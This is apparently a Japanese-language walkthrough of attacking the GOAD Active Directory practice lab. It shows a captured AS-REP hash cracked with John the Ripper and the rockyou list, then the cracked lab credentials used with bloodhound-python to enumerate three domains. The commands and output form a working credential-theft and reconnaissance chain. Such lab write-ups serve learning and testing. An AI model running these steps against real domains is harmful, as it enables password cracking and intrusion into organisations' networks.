$krb5asrep$23$brandon.stark@NORTH.SEVENKINGDOMS.LOCAL:35976c73e5060906dab8147e5b1d2744$c031e57e3027eff3cb057d019aea5eef51ced45a76744e48418951d7803eedea05caf1b9895cebee55c4f7504136e7729c16114a1d29b50085308b4d1ba22de8cb7f73610ede55094ed19453eb09f36d94af2b8261b6f63536bf25fb588a9e322340ad490821f4f2a0b884385a03b00467dd3e30d16bdfba1740c1eee7eafe3a239c8d73bcbee7b4b84bb78b402568de6dac8d3fa7b3b4bb6beaf8ac2e4cb356d087003117c44c81369aeaef75330f76a297376780a9ed2e98e106e42b6bb47967d59705c31ac82896f7045afd17d3469a1b18fb0429ca162577ef8facb7280b826abed3b7cd8c6aaabe6eaf07e204a46560968511cada085a5d9c4b128d95dd84e8194ada27
[-] Kerberos SessionError: KDC_ERR_C_PRINCIPAL_UNKNOWN(Client not found in Kerberos database)
[-] User eddard.stark doesn't have UF_DONT_REQUIRE_PREAUTH set
[-] Kerberos SessionError: KDC_ERR_CLIENT_REVOKED(Clients credentials have been revoked)
[-] User hodor doesn't have UF_DONT_REQUIRE_PREAUTH set
[-] User jeor.mormont doesn't have UF_DONT_REQUIRE_PREAUTH set
[-] User jon.snow doesn't have UF_DONT_REQUIRE_PREAUTH set
[-] Kerberos SessionError: KDC_ERR_CLIENT_REVOKED(Clients credentials have been revoked)
[-] User rickon.stark doesn't have UF_DONT_REQUIRE_PREAUTH set
[-] User robb.stark doesn't have UF_DONT_REQUIRE_PREAUTH set
[-] User samwell.tarly doesn't have UF_DONT_REQUIRE_PREAUTH set
[-] User sansa.stark doesn't have UF_DONT_REQUIRE_PREAUTH set
[-] User sql_svc doesn't have UF_DONT_REQUIRE_PREAUTH set
johnにかけたら一瞬でハッシュが解けた
┌──(kali㉿kali)-[~/goad/winterfell]
└─$ john --wordlist=/usr/share/wordlists/rockyou.txt brandon.stark.krb5asrep.hash
Using default input encoding: UTF-8
Loaded 1 password hash (krb5asrep, Kerberos 5 AS-REP etype 17/18/23 [MD4 HMAC-MD5 RC4 / PBKDF2 HMAC-SHA1 AES 256/256 AVX2 8x])
Will run 4 OpenMP threads
Press 'q' or Ctrl-C to abort, almost any other key for status
iseedeadpeople ($krb5asrep$23$brandon.stark@NORTH.SEVENKINGDOMS.LOCAL)
1g 0:00:00:00 DONE (2024-10-11 22:46) 5.555g/s 301511p/s 301511c/s 301511C/s soydivina..250984
Use the "--show" option to display all of the cracked passwords reliably
Session completed.
brandon.stark/iseedadpeople
という認証情報ゲット。
north.sevenkingdoms.local のドメインに所属しているユーザーの認証情報を取得できたのでこれでbloodhoundできるか試してみる。
resolve.conf にname serverを追加して試す(たぶんnsフラグでいいと思うが)
┌──(kali㉿kali)-[~/goad/winterfell/bloodhound]
└─$ cat /etc/resolv.conf
# Generated by NetworkManager
nameserver 10.0.2.3
nameserver 192.168.56.10
bloodhound-pythonが正常に動いた
┌──(kali㉿kali)-[~/goad/winterfell/bloodhound]
└─$ bloodhound-python --zip -c All -d north.sevenkingdoms.local -u brandon.stark -p iseedeadpeople -dc winterfell.north.sevenkingdoms.local
INFO: Found AD domain: north.sevenkingdoms.local
WARNING: Could not find a global catalog server, assuming the primary DC has this role
If this gives errors, either specify a hostname with -gc or disable gc resolution with --disable-autogc
INFO: Getting TGT for user
INFO: Connecting to LDAP server: winterfell.north.sevenkingdoms.local
INFO: Found 1 domains
INFO: Found 2 domains in the forest
INFO: Found 2 computers
INFO: Connecting to GC LDAP server: winterfell.north.sevenkingdoms.local
INFO: Connecting to LDAP server: winterfell.north.sevenkingdoms.local
INFO: Found 17 users
INFO: Found 51 groups
INFO: Found 3 gpos
INFO: Found 1 ous
INFO: Found 19 containers
INFO: Found 1 trusts
INFO: Starting computer enumeration with 10 workers
INFO: Querying computer: castelblack.north.sevenkingdoms.local
INFO: Querying computer: winterfell.north.sevenkingdoms.local
INFO: Done in 00M 00S
INFO: Compressing output into 20241011225036_bloodhound.zip
この調子で他のドメインの情報も集めていく
所属しているドメインの情報を含めないと弾かれるので注意
┌──(kali㉿kali)-[~/goad/winterfell/bloodhound]
└─$ bloodhound-python --zip -c All -d sevenkingdoms.local -u brandon.stark@north.sevenkingdoms.local -p iseedeadpeople -dc kingslanding.sevenkingdoms.local
INFO: Found AD domain: sevenkingdoms.local
INFO: Getting TGT for user
INFO: Connecting to LDAP server: kingslanding.sevenkingdoms.local
INFO: Found 1 domains
INFO: Found 2 domains in the forest
INFO: Found 1 computers
INFO: Connecting to LDAP server: kingslanding.sevenkingdoms.local
INFO: Found 16 users
INFO: Found 59 groups
INFO: Found 2 gpos
INFO: Found 9 ous
INFO: Found 19 containers
INFO: Found 2 trusts
INFO: Starting computer enumeration with 10 workers
INFO: Querying computer: kingslanding.sevenkingdoms.local
INFO: Done in 00M 00S
INFO: Compressing output into 20241011225327_bloodhound.zip
次はessos.local
┌──(kali㉿kali)-[~/goad/winterfell/bloodhound]
└─$ bloodhound-python --zip -c All -d essos.local -u brandon.stark@north.sevenkingdoms.local -p iseedeadpeople -dc meereen.essos.local
INFO: Found AD domain: essos.local
INFO: Getting TGT for user
INFO: Connecting to LDAP server: meereen.essos.local
INFO: Found 1 domains
INFO: Found 1 domains in the forest
INFO: Found 2 computers
INFO: Connecting to LDAP server: meereen.essos.local
INFO: Found 14 users
INFO: Found 59 groups
INFO: Found 3 gpos
INFO: Found 2 ous
INFO: Found 19 containers
INFO: Found 1 trusts
INFO: Starting computer enumeration with 10 workers
INFO: Querying computer: braavos.essos.local
INFO: Querying computer: meereen.essos.local
INFO: Done in 00M 00S
INFO: Compressing output into 20241011225440_bloodhound.zip
bloodhoundで表示できるようになった。
3つのzipファイルを入れたらいい感じにドメイン間の関係性とか表示してくれて良い。